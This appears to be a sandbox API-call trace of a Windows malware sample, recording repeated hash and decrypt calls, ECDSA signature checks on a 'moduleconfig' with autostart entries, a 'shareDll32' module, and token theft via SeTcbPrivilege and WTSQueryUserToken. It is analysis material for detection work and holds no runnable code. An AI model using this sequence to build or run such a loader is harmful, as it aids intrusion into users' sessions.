	[0230.003] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e9d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e9d0, pdwDataLen=0x128ba4) returned 1
	[0230.003] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.003] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.003] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.003] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.003] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0230.003] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e9f8
	[0230.003] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e9f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e9f8, pdwDataLen=0x128ba4) returned 1
	[0230.003] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.003] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.003] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.004] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.004] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0230.004] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ea20
	[0230.004] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ea20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ea20, pdwDataLen=0x128ba4) returned 1
	[0230.004] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.004] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.004] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.004] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.004] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0230.004] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ea48
	[0230.004] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ea48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ea48, pdwDataLen=0x128ba4) returned 1
	[0230.004] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.004] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.004] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.005] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.005] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0230.005] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ea70
	[0230.005] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ea70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ea70, pdwDataLen=0x128ba4) returned 1
	[0230.005] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.005] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.005] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.005] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.005] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0230.005] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ea98
	[0230.005] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ea98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ea98, pdwDataLen=0x128ba4) returned 1
	[0230.005] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.005] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.005] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.006] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.006] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0230.006] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eac0
	[0230.006] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231eac0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231eac0, pdwDataLen=0x128ba4) returned 1
	[0230.006] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.006] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.006] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.006] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.006] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0230.006] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eae8
	[0230.006] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231eae8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231eae8, pdwDataLen=0x128ba4) returned 1
	[0230.006] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.006] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.006] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.056] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.056] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0230.056] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eb10
	[0230.056] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231eb10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231eb10, pdwDataLen=0x128ba4) returned 1
	[0230.056] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.056] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.056] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.056] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.056] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0230.056] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ebb0
	[0230.056] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ebb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ebb0, pdwDataLen=0x128ba4) returned 1
	[0230.056] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.056] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.056] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.057] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.057] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0230.057] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ebd8
	[0230.057] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ebd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ebd8, pdwDataLen=0x128ba4) returned 1
	[0230.057] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.057] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.057] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.057] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.057] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0230.058] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ec00
	[0230.058] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ec00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ec00, pdwDataLen=0x128ba4) returned 1
	[0230.058] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.058] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.058] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.058] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.058] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0230.058] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ec28
	[0230.058] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ec28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ec28, pdwDataLen=0x128ba4) returned 1
	[0230.058] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.058] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.058] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.059] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.059] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0230.059] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ec50
	[0230.059] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ec50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ec50, pdwDataLen=0x128ba4) returned 1
	[0230.059] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.059] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.059] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.059] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.059] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0230.059] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ec78
	[0230.059] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ec78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ec78, pdwDataLen=0x128ba4) returned 1
	[0230.059] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.059] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.059] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.060] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.060] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0230.060] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231eca0
	[0230.060] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231eca0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231eca0, pdwDataLen=0x128ba4) returned 1
	[0230.060] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.060] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.060] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.060] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.060] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0230.060] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.060] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ecc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ecc8, pdwDataLen=0x128ba4) returned 1
	[0230.060] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.060] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.060] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.061] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.061] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0230.061] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.061] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ecf0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ecf0, pdwDataLen=0x128ba4) returned 1
	[0230.061] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.061] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.061] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.061] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.061] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0230.061] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.061] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ed18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ed18, pdwDataLen=0x128ba4) returned 1
	[0230.061] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0230.061] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.061] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0230.062] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0230.062] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0230.062] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0230.062] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ed40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ed40, pdwDataLen=0x128ba4) returned 1
	[0230.062] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0230.062] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.063] CryptImportKey (in: hProv=0x225e30, pbData=0x128b98, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128bd8 | out: phKey=0x128bd8*=0x22b6a80) returned 1
	[0230.063] CryptSetKeyParam (hKey=0x22b6a80, dwParam=0x4, pbData=0x128bc4*=0x1, dwFlags=0x0) returned 1
	[0230.063] CryptSetKeyParam (hKey=0x22b6a80, dwParam=0x1, pbData=0x231ee58, dwFlags=0x0) returned 1
	[0230.063] CryptDecrypt (in: hKey=0x22b6a80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x274a0b8, pdwDataLen=0x128bcc | out: pbData=0x274a0b8, pdwDataLen=0x128bcc) returned 1
	[0230.063] CryptDestroyKey (hKey=0x22b6a80) returned 1
	[0230.063] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0230.063] GetVersion () returned 0x1db10106
	[0230.064] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128bd8, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128bd8) returned 0x0
	[0230.064] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128be0, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128be0) returned 0x0
	[0230.066] BCryptGetProperty (in: hObject=0x229a3d0, pszProperty="SignatureLength", pbOutput=0x128bf8, cbOutput=0x4, pcbResult=0x128bd0, dwFlags=0x0 | out: pbOutput=0x128bf8, pcbResult=0x128bd0) returned 0x0
	[0230.066] BCryptVerifySignature (hKey=0x229a3d0, pPaddingInfo=0x0, pbHash=0x22a6340, cbHash=0x30, pbSignature=0x274c8f7, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0230.068] BCryptDestroyKey (in: hKey=0x229a3d0 | out: hKey=0x229a3d0) returned 0x0
	[0230.068] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0230.068] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6340) returned 1
	[0230.069] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0230.069] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0230.069] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b77e8) returned 1
	[0230.069] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9
	[0230.069] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b77e8) returned 1
	[0230.070] WriteFile (in: hFile=0x5f0, lpBuffer=0x277bc00*, nNumberOfBytesToWrite=0x28e0, lpNumberOfBytesWritten=0x128c38, lpOverlapped=0x0 | out: lpBuffer=0x277bc00*, lpNumberOfBytesWritten=0x128c38*=0x28e0, lpOverlapped=0x0) returned 1
	[0230.071] CloseHandle (hObject=0x5f0) returned 1
	[0230.071] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x277bc00) returned 1
	[0230.071] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b30b8) returned 1
	[0230.072] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6308) returned 1
	[0230.072] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0230.072] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0230.072] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0230.072] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27784b0) returned 1
	[0230.072] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x209fc0, Size=0x20) returned 0x27784b0
	[0230.072] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c18) returned 1
	[0230.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="shareDll32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
	[0230.072] lstrcmpiW (lpString1="control", lpString2="start") returned -1
	[0230.072] lstrcmpiW (lpString1="control", lpString2="release") returned -1
	[0230.072] CloseHandle (hObject=0x0) returned 0
	[0230.072] CloseHandle (hObject=0x0) returned 0
	[0230.072] CloseHandle (hObject=0x0) returned 0
	[0230.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0230.072] GetStartupInfoW (in: lpStartupInfo=0x1285d4 | out: lpStartupInfo=0x1285d4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2777c18, hStdError=0x1d6c70)) 
	[0230.072] GetCurrentProcess () returned 0xffffffff
	[0230.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x1286a4 | out: TokenHandle=0x1286a4*=0x60c) returned 1
	[0230.072] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x128660 | out: lpLuid=0x128660*(LowPart=0x7, HighPart=0)) returned 1
	[0230.073] AdjustTokenPrivileges (in: TokenHandle=0x60c, DisableAllPrivileges=0, NewState=0x12865c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x128618, ReturnLength=0x128670 | out: PreviousState=0x128618, ReturnLength=0x128670) returned 1
	[0230.073] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x128674, pCount=0x128684 | out: ppSessionInfo=0x128674, pCount=0x128684) returned 1
	[0230.074] WTSFreeMemory (pMemory=0x22a6340) 
	[0230.074] RevertToSelf () returned 1
	[0230.074] WTSQueryUserToken (SessionId=0x1, phToken=0x128694*=0xffffffff) returned 1
	[0230.075] DuplicateTokenEx (in: hExistingToken=0x5f0, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x1286a8 | out: phNewToken=0x1286a8*=0x5c8) returned 1
	[0230.075] CloseHandle (hObject=0x5f0) returned 1
	[0230.075] GetTokenInformation (in: TokenHandle=0x5c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1286a0 | out: TokenInformation=0x0, ReturnLength=0x1286a0) returned 0
	[0230.075] GetLastError () returned 0x7a
	[0230.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6340
